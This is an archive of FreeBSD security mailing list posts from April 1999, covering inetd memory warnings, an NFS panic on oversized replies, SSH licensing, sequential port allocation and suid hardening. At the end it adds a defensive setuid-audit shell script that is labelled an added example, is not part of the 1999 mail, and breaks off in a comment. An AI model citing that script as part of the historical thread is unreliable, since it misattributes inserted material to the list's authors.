I've seen this before, on a 2.2.6 system. IIRC, the answer from Jordan was that there was a subtle bug in inetd (or triggered by inetd) which caused this sort of memory problem.
I don't recall whether killing and restarting inetd was enough to "fix" it or if it required a reboot. I'm fairly certain that it didn't represent a security problem.

--Jeff

From owner-freebsd-security Mon Apr 12 09:18:47 1999
Message-Id: <199904121616.JAA00600@passer.osg.gov.bc.ca>
Date: Mon, 12 Apr 1999 09:15:52 -0700
From: Cy Schubert
Reply-To: Cy Schubert - ITSD Open Systems Group
To: Max Booth
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: inetd problems
In-reply-to: Your message of "Mon, 12 Apr 1999 16:17:47 BST." <37120E9B.1AE1FD8D@ukonline.net>

In message <37120E9B.1AE1FD8D@ukonline.net>, Max Booth writes:
> Hi all,
>
> Recently, since the load on one of our FreeBSD 3.0 systems has been increasing I keep on getting the following errors when attempting connections to the system:
>
> Escape character is '^]'.
> inetd in realloc(): warning: junk pointer, too low to make sense.
> inetd in free(): warning: junk pointer, too low to make sense.
> Connection closed by foreign host.
>
> The only thing using inetd now is telnetd, so I can't imagine that it's due to inetd being under too much pressure.
>
> Has anyone else experienced this problem?

You're short of memory. Do a vmstat 5. If you see scan rates > 200-300 pages per second over a long period of time or scan rates > 5000 pages per second over a 20 second period of time, or if you experience pageout rates of >7-10 pages per second you need more RAM. See my comments from "Re: CRON in malloc(): warning: pointer to wrong page" Mon, 12 Apr 1999 06:54:00 for the long story.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Province of BC
            "e**(i*pi)+1=0"

From owner-freebsd-security Mon Apr 12 11:54:21 1999
Message-ID: <19990412115045.B8671@best.com>
Date: Mon, 12 Apr 1999 11:50:45 -0700
From: "Jan B. Koum"
To: Matthew Dillon, "David E. Cross"
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: increased crashing in NFS server
References: <199904110341.XAA17071@cs.rpi.edu> <199904110703.AAA03493@apollo.backplane.com>
In-Reply-To: <199904110703.AAA03493@apollo.backplane.com>; from Matthew Dillon on Sun, Apr 11, 1999 at 12:03:49AM -0700

On Sun, Apr 11, 1999 at 12:03:49AM -0700, Matthew Dillon wrote:
> :I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when contacting our servers (FreeBSD3 of the same build tree). We have noticed an increase in crashing of our main home directory server (which is the only server really handling RW mounts, our other servers are mostly RO, with some minor RW activity.) The first crash was obviously NFS. I traced it to one of 2 possible crash points in the kernel (sorry, no stack trace, we don't [yet] have crashlogs enabled for that machine.).
> :
> :The panic was:
> :mbuf siz=33476
> :panic: Bad nfs svc reply
>
> You are using a 32K file block size? If so, reduce it to 8K.
>
> I think you've just shown us a security hole in the NFS system -- it panics if it is given too large a response packet. Oops. It should just print a message and drop the packet.

This is not a new bug Matt :( Take a look at kern/6771 PR (still open).
--
Yan

From owner-freebsd-security Mon Apr 12 12:31:10 1999
Message-Id: <4.2.0.32.19990412132649.043b7350@localhost>
Date: Mon, 12 Apr 1999 13:28:39 -0600
From: Brett Glass
To: Igor Roshchin
Cc: security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
In-Reply-To: <199904100752.CAA21374@alecto.physics.uiuc.edu>
References: <4.2.0.32.19990409184654.045424d0@localhost>

As I understand it, SSH is encumbered by a license that requires you to pay big bucks unless you're an individual or a non-profit. I'd need to build the protocol into the specialized client software, too, which also isn't allowed by the license. If it were BSD-licensed, it wouldn't be a problem.

--Brett

At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote:
>> Is this so? I was under the impression that the default group of a new file was the login group of the creator, as specified in /etc/passwd.
>
>The group by default is the group of the directory.
>No sgid need to be set on the directory.
>I've been using this in FreeBSD for a few years.
>In System V (Irix) - it's different.
>
>Just an idea for the secure files transfer - "scp" (ssh) -
>it allows to transfer everything securely.
>ssh can be used to delete the files.
>
>Igor
>

From owner-freebsd-security Mon Apr 12 13:48:59 1999
Message-Id: <199904122046.PAA01508@alecto.physics.uiuc.edu>
Date: Mon, 12 Apr 1999 15:46:35 -0500 (CDT)
From: Igor Roshchin
To: brett@lariat.org (Brett Glass)
Cc: security@freebsd.org
Subject: Re: Interesting problem: chowning files sent via FTP
In-Reply-To: <4.2.0.32.19990412132649.043b7350@localhost> from "Brett Glass" at "Apr 12, 1999 1:28:39 pm"

That's the case for SSH v.2.x

1.x - is free for any use.

check SSH's web site
(http://www.ssh.fi/, I believe)

Igor

> As I understand it, SSH is encumbered by a license that requires you to pay big bucks unless you're an individual or a non-profit. I'd need to build the protocol into the specialized client software, too, which also isn't allowed by the license. If it were BSD-licensed, it wouldn't be a problem.
>
> --Brett
>
> At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote:
> >> Is this so? I was under the impression that the default group of a new file was the login group of the creator, as specified in /etc/passwd.
> >
> >The group by default is the group of the directory.
> >No sgid need to be set on the directory.
> >I've been using this in FreeBSD for a few years.
> >In System V (Irix) - it's different.
> >
> >Just an idea for the secure files transfer - "scp" (ssh) -
> >it allows to transfer everything securely.
> >ssh can be used to delete the files.
> >
> >Igor
>

From owner-freebsd-security Mon Apr 12 13:50:32 1999
Message-Id: <199904122047.NAA01335@ryouko.nas.nasa.gov>
Date: Mon, 12 Apr 1999 13:47:45 -0700
From: "Gregory P. Smith"
To: Brett Glass
Cc: Igor Roshchin, security@FreeBSD.ORG
Subject: ssh protocol [was: Interesting problem: chowning files sent via FTP]
In-reply-to: Your message of "Mon, 12 Apr 1999 13:28:39 MDT." <4.2.0.32.19990412132649.043b7350@localhost>

> As I understand it, SSH is encumbered by a license that requires you to pay big bucks unless you're an individual or a non-profit. I'd need to build the protocol into the specialized client software, too, which also isn't allowed by the license. If it were BSD-licensed, it wouldn't be a problem.

The ssh PROTOCOL is free. In fact, the v2 protocol is making progress towards becoming an IETF standard. (v2 fixes some serious bugs in the v1 protocol).
There is a free (GNU) ssh v2 protocol implementation in the works... Check out

http://www.net.lut.ac.uk/psst/

(specifically, look at lsh)

-Greg

From owner-freebsd-security Mon Apr 12 14:30:08 1999
Message-Id: <4.2.0.32.19990412152634.00ce0bb0@localhost>
Date: Mon, 12 Apr 1999 15:27:27 -0600
From: Brett Glass
To: "Gregory P. Smith"
Cc: Igor Roshchin, security@FreeBSD.ORG
Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]
In-Reply-To: <199904122047.NAA01335@ryouko.nas.nasa.gov>

A GPLed implementation would be a bad idea, because it would prevent the code from being incorporated into commercial products and thus discourage standardization. This is one situation in which BSD-type licensing would be infinitely preferable.

--Brett

At 01:47 PM 4/12/99 -0700, Gregory P. Smith wrote:
>> As I understand it, SSH is encumbered by a license that requires you to pay big bucks unless you're an individual or a non-profit. I'd need to build the protocol into the specialized client software, too, which also isn't allowed by the license. If it were BSD-licensed, it wouldn't be a problem.
>
>The ssh PROTOCOL is free.
>In fact, the v2 protocol is making progress towards becoming an IETF standard. (v2 fixes some serious bugs in the v1 protocol). There is a free (GNU) ssh v2 protocol implementation in the works... Check out
>
>http://www.net.lut.ac.uk/psst/
>
>(specifically, look at lsh)
>
>-Greg

From owner-freebsd-security Mon Apr 12 14:56:36 1999
Message-Id: <9904121656.ZM5526@beatrice.rutgers.edu>
Date: Mon, 12 Apr 1999 16:56:25 -0400
From: "Allen Smith"
To: Brett Glass, "Gregory P. Smith"
Cc: Igor Roshchin, security@FreeBSD.ORG
Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]
In-Reply-To: Brett Glass "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 4:30pm)
References: <4.2.0.32.19990412152634.00ce0bb0@localhost>

On Apr 12, 4:30pm, Brett Glass (possibly) wrote:
> A GPLed implementation would be a bad idea, because it would prevent the code from being incorporated into commercial products and thus discourage standardization. This is one situation in which BSD-type licensing would be infinitely preferable.

Actually, what would be preferable is some form of GNU _library_ license. I'm not willing to trust an encryption program unless I know independent cryptographers have reviewed the code.
	-Allen

--
Allen Smith			easmith@beatrice.rutgers.edu

From owner-freebsd-security Mon Apr 12 15:13:24 1999
Message-Id: <4.2.0.32.19990412160742.00c35dc0@localhost>
Date: Mon, 12 Apr 1999 16:10:46 -0600
From: Brett Glass
To: "Allen Smith", "Gregory P. Smith"
Cc: Igor Roshchin, security@FreeBSD.ORG
Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]
In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu>
References: <4.2.0.32.19990412152634.00ce0bb0@localhost>

Berkeley licensing would also allow cryptographers to review the code, but would have the advantage that people could incorporate it not just as a library but as an integral part of a product. Also, Richard Stallman has pretty much decreed that the LGPL is history as far as FSF and "GNU" projects are concerned. They'll use the GPL on their libraries in an attempt to force companies to give up their work. This will backfire, of course, and we'll wind up with incompatible implementations.
--Brett

At 04:56 PM 4/12/99 -0400, Allen Smith wrote:
>On Apr 12, 4:30pm, Brett Glass (possibly) wrote:
>> A GPLed implementation would be a bad idea, because it would prevent
>> the code from being incorporated into commercial products and thus
>> discourage standardization. This is one situation in which BSD-type
>> licensing would be infinitely preferable.
>
>Actually, what would be preferable is some form of GNU _library_ license. I'm
>not willing to trust an encryption program unless I know independent
>cryptographers have reviewed the code.
>
> -Allen
>
>--
>Allen Smith easmith@beatrice.rutgers.edu
>

From owner-freebsd-security Mon Apr 12 16:49:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6B1D1155E6 for ; Mon, 12 Apr 1999 16:49:05 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id TAA22009; Mon, 12 Apr 1999 19:46:20 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 12 Apr 1999 19:46:19 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Igor Roshchin Cc: Brett Glass , security@freebsd.org Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: <199904122046.PAA01508@alecto.physics.uiuc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

As usual, recall that there are patents on both RSA and IDEA; use may be restricted as a result, especially inclusion for the purposes of redistribution.
The FreeBSD port is careful to download RSAREF to satisfy at least a few of the RSA clauses; I think 3DES is now the default not IDEA in the port but I'm not sure off hand. Fortunately, the RSA patent expires RSN (yay!).

On Mon, 12 Apr 1999, Igor Roshchin wrote:
> That's the case for SSH v.2.x
>
> 1.x - is free for any use.
>
> check SSH's web site
> (http://www.ssh.fi/, I believe)
>
> Igor
>
>
> > As I understand it, SSH is encumbered by a license that requires
> > you to pay big bucks unless you're an individual or a non-profit.
> > I'd need to build the protocol into the specialized client
> > software, too, which also isn't allowed by the license. If it
> > were BSD-licensed, it wouldn't be a problem.
> >
> > --Brett
> >
> > At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote:
> > >> Is this so? I was under the impression that the default group of a
> > >> new file was the login group of the creator, as specified in /etc/passwd.
> > >
> > >The group by default is the group of the directory.
> > >No sgid needs to be set on the directory.
> > >I've been using this in FreeBSD for a few years.
> > >In System V (Irix) - it's different.
> > >
> > >Just an idea for the secure files transfer - "scp" (ssh) -
> > >it allows you to transfer everything securely.
> > >ssh can be used to delete the files.
> > >
> > >Igor
>

Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/
Safeport Network Services http://www.safeport.com/

From owner-freebsd-security Mon Apr 12 17:10: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id A5FB9153FA for ; Mon, 12 Apr 1999 17:09:52 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.2/8.9.2) with ESMTP id UAA08397; Mon, 12 Apr 1999 20:08:13 -0400 (EDT) (envelope-from matt@zigg.com) Date: Mon, 12 Apr 1999 20:08:12 -0400 (EDT) From: Matt Behrens To: Allen Smith Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

While LGPL is certainly acceptable, code being put under the BSD license does not mean it hasn't been reviewed by independent folk. (Hmm, aren't we on a list that discusses some rather oft-reviewed BSD-licensed software?) :-)

On Mon, 12 Apr 1999, Allen Smith wrote:
: On Apr 12, 4:30pm, Brett Glass (possibly) wrote:
: > A GPLed implementation would be a bad idea, because it would prevent
: > the code from being incorporated into commercial products and thus
: > discourage standardization. This is one situation in which BSD-type
: > licensing would be infinitely preferable.
:
: Actually, what would be preferable is some form of GNU _library_ license. I'm
: not willing to trust an encryption program unless I know independent
: cryptographers have reviewed the code.
Matt Behrens
Owner/Administrator, zigg.com
Chief Engineer, Nameless IRC Network

From owner-freebsd-security Mon Apr 12 18:15: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 2F76D1565D for ; Mon, 12 Apr 1999 18:15:00 -0700 (PDT) (envelope-from nick@shibumi.feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id MAA30426; Tue, 13 Apr 1999 12:10:10 GMT (envelope-from nick@shibumi.feralmonkey.org) Date: Tue, 13 Apr 1999 12:10:09 +0000 (GMT) From: 0x1c To: Allen Smith Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 12 Apr 1999, Allen Smith wrote:
> On Apr 12, 4:30pm, Brett Glass (possibly) wrote:
> > A GPLed implementation would be a bad idea, because it would prevent
> > the code from being incorporated into commercial products and thus
> > discourage standardization. This is one situation in which BSD-type
> > licensing would be infinitely preferable.
>
> Actually, what would be preferable is some form of GNU _library_ license. I'm
> not willing to trust an encryption program unless I know independent
> cryptographers have reviewed the code.

How does the licence (gpl, lgpl, or bsd) have anything to do with independent cryptographers reviewing the code? The only crucial requirement is that the relevant source be available for analysis.

Nick

--
Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers.
-- Sun Tzu, The Art of War

From owner-freebsd-security Tue Apr 13 2:56:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6D5D014D5D for ; Tue, 13 Apr 1999 02:56:14 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id LAA22628; Tue, 13 Apr 1999 11:53:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id LAA10931; Tue, 13 Apr 1999 11:53:50 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Jared Mauch Cc: "Serguei V. Melekhov" , "freebsd-security@FreeBSD.ORG" Subject: Re: /Kernel Calcru In-reply-to: Your message of "Thu, 08 Apr 1999 13:24:50 EDT." <19990408132450.J11653@puck.nether.net> Date: Tue, 13 Apr 1999 11:53:50 +0200 Message-ID: <10929.923997230@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Please look in the FAQ.

Poul-Henning

In message <19990408132450.J11653@puck.nether.net>, Jared Mauch writes:
> It's a calculation of cpu time the process has used.
>
> Somewhere there was a math error, causing a negative time
>to appear.
>
> I get thousands of these on some of my servers:
>
>eg:
>calcru: negative time of -12177441 usec for pid 1420 (cucipop)
>
> etc..
>
> I've not seen it be of any harm, but it may be
>somehow that i'm not aware of.
>
>
>On Thu, Apr 08, 1999 at 04:20:01PM +0400, Serguei V. Melekhov wrote:
>> Hello,
>> Sorry for the dumb question. Just don't know what that means?
>> Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec
>> Anyway, Time plays no role here. Just this kernel calcru message?!
>>
>> Thanks in advance.
>
>--
>Jared Mauch | pgp key available via finger from jared@puck.nether.net
>clue++; | http://puck.nether.net/~jared/ My statements are only mine.
>

--
Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG
"Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Tue Apr 13 5:21:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id C694414BFA for ; Tue, 13 Apr 1999 05:21:30 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA23434; Tue, 13 Apr 1999 09:18:46 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904131218.JAA23434@ns1.sminter.com.ar> Subject: Re: inetd problems In-Reply-To: <199904121616.JAA00600@passer.osg.gov.bc.ca> from Cy Schubert at "Apr 12, 99 09:15:52 am" To: Cy.Schubert@uumail.gov.bc.ca Date: Tue, 13 Apr 1999 09:18:46 -0300 (GMT) Cc: max@ukonline.net, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In an earlier message, Cy Schubert wrote:
[...]
> See my comments from "Re: CRON in malloc(): warning: pointer to
> wrong page" Mon, 12 Apr 1999 06:54:00 for the long story.

I can't find it in the archives. Where did you post it?

Regards.

Fernando P.
Schapachnik
Network Administration
VIA Net Works Argentina SA

From owner-freebsd-security Tue Apr 13 5:30:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id ED74F14C93 for ; Tue, 13 Apr 1999 05:30:16 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id FAA18238; Tue, 13 Apr 1999 05:30:39 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda18236; Tue Apr 13 05:30:37 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id FAA05312; Tue, 13 Apr 1999 05:27:49 -0700 (PDT) Message-Id: <199904131227.FAA05312@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdUP5308; Tue Apr 13 05:27:44 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: Fernando Schapachnik Cc: Cy.Schubert@uumail.gov.bc.ca, max@ukonline.net, freebsd-security@FreeBSD.ORG Subject: Re: inetd problems In-reply-to: Your message of "Tue, 13 Apr 1999 09:18:46 -0300." <199904131218.JAA23434@ns1.sminter.com.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Date: Tue, 13 Apr 1999 05:27:43 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message <199904131218.JAA23434@ns1.sminter.com.ar>, Fernando Schapachnik writes:
> In an earlier message, Cy Schubert wrote:
> [...]
> > See my comments from "Re: CRON in malloc(): warning: pointer to
> > wrong page" Mon, 12 Apr 1999 06:54:00 for the long story.
>
> I can't find it in the archives. Where did you post it?

Silly me, looking at the subject line I thought this discussion was on stable -- didn't even bother to look at the cc list. Well that's where the discussion was and where my comment was made.

Regards, Phone: (250)387-8437
Cy Schubert Fax: (250)387-5766
Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca
ITSD Cy.Schubert@gems8.gov.bc.ca
Province of BC "e**(i*pi)+1=0"

From owner-freebsd-security Tue Apr 13 6:16:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 020FA14C19 for ; Tue, 13 Apr 1999 06:16:28 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10X30V-000Aa4-00; Tue, 13 Apr 1999 15:13:39 +0200 From: Sheldon Hearn To: Igor Roshchin Cc: brett@lariat.org (Brett Glass), security@freebsd.org Subject: Re: Interesting problem: chowning files sent via FTP In-reply-to: Your message of "Mon, 12 Apr 1999 15:46:35 EST." <199904122046.PAA01508@alecto.physics.uiuc.edu> Date: Tue, 13 Apr 1999 15:13:39 +0200 Message-ID: <40675.924009219@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 12 Apr 1999 15:46:35 EST, Igor Roshchin wrote:
> That's the case for SSH v.2.x
>
> 1.x - is free for any use.

No! See the COPYING file from the ssh distribution:

| (a) You may copy and distribute literal (i.e., verbatim) copies of the
| Program's source code as you receive it throughout the world, in any
| medium.
|
| Local regulations may exist which limit your rights to distribute or use
| cryptographic software. The Licensor is not responsible for unauthorized
| distribution or use of the Program in such territories.
|
| (b) You may use the program for non-commercial purposes only, meaning
| that the program must not be sold commercially as a separate product,
| as part of a bigger product or project, or otherwise used for
| financial gain without a separate license. Please see Section 2,
| Restrictions, for more details.

What _is_ true is that ssh 1.x is free for most use. Brett would want to read the COPYING file carefully to make sure that he can use it as part of a saleable solution.

Ciao,
Sheldon.

From owner-freebsd-security Tue Apr 13 8: 7:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id CF00D15254 for ; Tue, 13 Apr 1999 08:07:13 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA21502; Tue, 13 Apr 1999 11:05:03 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Sequential TCP port allocation? In-Reply-To: <19990412120126.B15762@homer.louisville.edu> from Keith Stevenson at "Apr 12, 99 12:01:26 pm" To: k.stevenson@louisville.edu (Keith Stevenson) Date: Tue, 13 Apr 1999 11:05:03 -0400 (EDT) Cc: freebsd-security@freebsd.org Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[I can't help too much with the subject matter, but this might be better suited to -security. I'm forwarding this there. However, one comment below.]

Keith Stevenson wrote,
> We recently had an auditing firm run ISS against our network.
> The only
> "vulnerability" detected on our production FreeBSD box was a problem with
> "Predictable Sequence Ports". The description states that this FreeBSD box
> allocates its port numbers in sequential order.
>
> I've looked at several of my 2.2.8 boxes, and sure enough this appears to be
> true. Is there a setting or sysctl knob that I can tweak to change the system
> to allocate ports in a more random manner? If not, does 3.1-STABLE exhibit
> the same behavior?
>
> (Whether or not this qualifies as a real security vulnerability is irrelevant
> to me. Since the auditors labeled this as a "security hole" I have to present
> some sort of response to my management.)

I think it does matter if it is a 'real' vulnerability, _especially_ when talking to management. If it is going to cost $$$ to fix the problem or go with another solution, one must weigh risks against such a cost. There is no such thing as security-at-all-costs (unless you work for the NSA or sumthin'). If you truly want to be secure, do not connect to the Internet, assign each user random passwords (but make sure they don't write them down on Post-It Notes(tm) on the side of the monitor), and put all of the machines in an access-controlled area with EM screening to keep in the Tempest radiation. Of course, that's an outlandish example, but one must remember there are always costs and benefits to be weighed.

--
Crist J.
Clark cjclark@home.com

From owner-freebsd-security Tue Apr 13 8:33: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id E4A74156B7 for ; Tue, 13 Apr 1999 08:33:01 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id LAA21022; Tue, 13 Apr 1999 11:30:39 -0400 (envelope-from jared) Date: Tue, 13 Apr 1999 11:30:39 -0400 From: Jared Mauch To: cjclark@home.com Cc: Keith Stevenson , freebsd-security@FreeBSD.ORG Subject: Re: Sequential TCP port allocation? Message-ID: <19990413113039.H17083@puck.nether.net> Mail-Followup-To: cjclark@home.com, Keith Stevenson , freebsd-security@FreeBSD.ORG References: <19990412120126.B15762@homer.louisville.edu> <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199904131505.LAA21502@cc942873-a.ewndsr1.nj.home.com>; from Crist J. Clark on Tue, Apr 13, 1999 at 11:05:03AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The easiest way to determine the ease of tcp sequence guessing is to use nmap (www.insecure.org/nmap/), which will even go as far as telling you what OS the box is running. I would recommend this tool to everyone.

On Tue, Apr 13, 1999 at 11:05:03AM -0400, Crist J. Clark wrote:
> [I can't help too much with the subject matter, but this might be
> better suited to -security. I'm forwarding this there. However, one
> comment below.]
>
> Keith Stevenson wrote,
> > We recently had an auditing firm run ISS against our network. The only
> > "vulnerability" detected on our production FreeBSD box was a problem with
> > "Predictable Sequence Ports".
> > The description states that this FreeBSD box
> > allocates its port numbers in sequential order.
> > ...
>
> I think it does matter if it is a 'real' vulnerability, _especially_
> when talking to management. If it is going to cost $$$ to fix the
> problem or go with another solution, one must weigh risks against such
> a cost. There is no such thing as security-at-all-costs (unless you
> work for the NSA or sumthin'). If you truly want to be secure, do not
> connect to the Internet, assign each user random passwords (but make
> sure they don't write them down on Post-It Notes(tm) on the side of
> the monitor), and put all of the machines in an access-controlled
> area with EM screening to keep in the Tempest radiation. Of course,
> that's an outlandish example, but one must remember there are always
> costs and benefits to be weighed.

Yes. Putting machines behind an outgoing-only firewall, or only allowing a few things in (smtp, ident, ssh) will greatly reduce the number of attacks possible. Take a close look at everyone that probes your portmapper, and audit your machines for suid binaries that are not used by you. Are you using lpr/lpd and such? What about uucp?

I make it a habit to remove suid bits (and sgid) from most everything possible (I've been kinda slacking recently on that), but it makes it more and more difficult to break into the system once you're on it. It's almost safe to say once you have an account on the system, you can do whatever you want, because there'll be some unknown bug, etc.. that may be hiding away from you, and someone has to be the one to find it ;)

Also, remember that physical access == root in 99.99% of the cases.

- Jared

--
Jared Mauch | pgp key available via finger from jared@puck.nether.net
clue++; | http://puck.nether.net/~jared/ My statements are only mine.
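An audit of the kind Jared describes, written here as an added example (it is not code from the list or from FreeBSD): it lists every setuid/setgid file under a tree and reports the ones missing from a baseline you keep of the set-id binaries you actually need. The tree root, the baseline file and the sample paths in the comments are assumptions.

```shell
#!/bin/sh
# Added example: inventory setuid/setgid files and flag anything not in a
# known-good baseline, so unneeded set-id binaries can be found and have
# their bits removed (chmod u-s,g-s) as the message above recommends.
# All paths are assumptions; nothing here is FreeBSD's own code.

# list_setid ROOT
# Print every regular file under ROOT with the setuid (4000) or setgid
# (2000) bit set, one path per line, sorted so the output can be fed to
# comm(1). -xdev keeps the walk on a single filesystem.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# audit_setid ROOT BASELINE
# BASELINE is a sorted file listing the paths that are expected to be set-id.
# Prints each set-id file under ROOT that is not in BASELINE and returns 1;
# returns 0 when nothing unexpected was found, so the function can drive a
# periodic check (cron, the daily security run) or raise an alert.
audit_setid() {
    unexpected=$(list_setid "$1" | comm -23 - "$2")
    [ -z "$unexpected" ] && return 0
    printf '%s\n' "$unexpected"
    return 1
}

# Typical use (assumed paths): build the baseline once on a freshly
# installed and hardened host, then run the audit on a schedule.
#   list_setid / > /var/db/setid.baseline
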